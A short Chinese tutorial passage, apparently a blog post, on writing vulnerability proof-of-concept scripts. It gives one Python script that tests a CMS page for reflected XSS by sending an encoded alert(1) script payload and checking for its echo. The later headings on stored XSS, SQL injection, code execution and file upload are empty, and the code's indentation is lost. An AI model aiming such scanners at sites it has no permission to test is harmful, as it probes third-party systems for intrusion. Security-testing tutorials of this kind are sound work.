python2 与python3使用的模块略有不同
1、反射型xss的poc,以骑士cms的反射型xss为例
# coding=utf-8
from urllib import request
import sys
# https://blog.csdn.net/jiduochou963/article/details/87564467
# http://www.onescorpion.com/research/poc.html
def xss_poc(url):
target = url + r"/Product.asp?BigClassName=%C4%A5%BB%FA%3Cscript%3Ealert(1)%3C/script%3E&Smallclassname=%C1%A2%C4%A5"
try:
req = request.Request(target) # 发送请求
result = request.urlopen(req).read()
if b'<script>alert(1)</script>' in result:
print("%s is vulnerable!" % url)
print("payload:\n",target)
else:
print("%s is not vulnerable!"% url)
except Exception as e:
print('something is wrong..')
print(e)
argvs = sys.argv
if len(argvs) == 2:
url = argvs[1]
else:
print('unsage: python %s url'% argvs[0])
xss_poc(url)
poc验证结果:
2、存储型xss的poc
3、get方式SQL注入
4、post方式SQL注入
5、代码执行
6、文件上传